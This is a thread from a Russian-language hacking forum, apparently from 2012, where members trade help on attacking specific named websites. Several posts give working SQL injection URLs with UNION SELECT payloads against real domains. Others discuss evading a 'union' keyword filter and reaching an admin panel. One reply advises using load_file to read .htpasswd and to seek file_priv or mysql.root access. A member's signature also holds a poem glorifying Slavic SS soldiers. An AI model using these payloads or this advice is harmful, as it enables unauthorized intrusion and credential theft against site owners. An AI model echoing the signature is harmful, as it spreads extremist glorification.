HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20481  
Старый 22.04.2012, 20:44
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
Как крутить без еррорбазед?
Всмысле как?

Код:
Code:
http://www.si-ultra.biz/catalog/seria.php?k=12-9999.9+union+select+1,version(),3--+f
Тайтл смотри
 
Ответить с цитированием

  #20482  
Старый 22.04.2012, 20:47
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Всмысле как?
Код:
Code:
http://www.si-ultra.biz/catalog/seria.php?k=12-9999.9+union+select+1,version(),3--+f
Тайтл смотри
Сенк! А если в тайтле вывода бы не было?
 
Ответить с цитированием

  #20483  
Старый 22.04.2012, 23:15
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Цитата:
Сообщение от None  
http://www.nashpereviznuk.net/PRINT.php?r=news&new=4664+union+select+1,2,3,4,5,6 ,7,8,9,10,11+--+
wtf?
 
Ответить с цитированием

  #20484  
Старый 22.04.2012, 23:21
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
wtf?
http://www.nashpereviznuk.net/print.php?r=news&new=-4664+union+select+1,version(),3,4,5,6,7,8,9,10,11--+

Цитата:
Сообщение от None  
PRINT.php
wtf?

Цитата:
Сообщение от None  
+--+
wtf?
 
Ответить с цитированием

  #20485  
Старый 23.04.2012, 10:52
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

Хелп ми )) фильтруется union, что можно сделать?

Пробовал:

-разным регистром написать

-/*!UnIoN*/

при нахождении union в запросе выдает The requested URL was not found on this server.
 
Ответить с цитированием

  #20486  
Старый 23.04.2012, 11:04
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479

Репутация: 2
По умолчанию

Цитата:
Сообщение от Kraneg  
Kraneg said:
Хелп ми )) фильтруется union, что можно сделать?
Пробовал:
-разным регистром написать
-/*!UnIoN*/
при нахождении union в запросе выдает The requested URL was not found on this server.
https://rdot.org/forum/showthread.php?t=60
 
Ответить с цитированием

  #20487  
Старый 23.04.2012, 18:44
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию

Нашел скулю в пост запросе. Помогли её раскрутить. Но такая проблема, в роботс прописано вот что:

Код:
Code:
User-agent: *
Crawl-delay: 5 #
Disallow: /admin/
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /logs/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/
Disallow: /search/?s*
при переходе на /admin вылезает бейсик авторизация, лог пас пара не верная. Что делать?
 
Ответить с цитированием

  #20488  
Старый 23.04.2012, 18:48
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

предполагаю что это джумла, а админка как бы тут /administrator/
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #20489  
Старый 23.04.2012, 18:52
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
HAXTA4OK said:
предполагаю что это джумла, а админка как бы тут /administrator/
/administrator/ тоже выдает бейсик авторизацию
 
Ответить с цитированием

  #20490  
Старый 23.04.2012, 18:57
красавец
Guest
Сообщений: n/a
Провел на форуме:
5300

Репутация: 5
По умолчанию

Cherep

попробуй через load_file вытащить то что в корне сайта в .htpasswd

если есть права на чтение, или просто проверь file_priv, а может повезёт и есть доступ к mysql.root ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ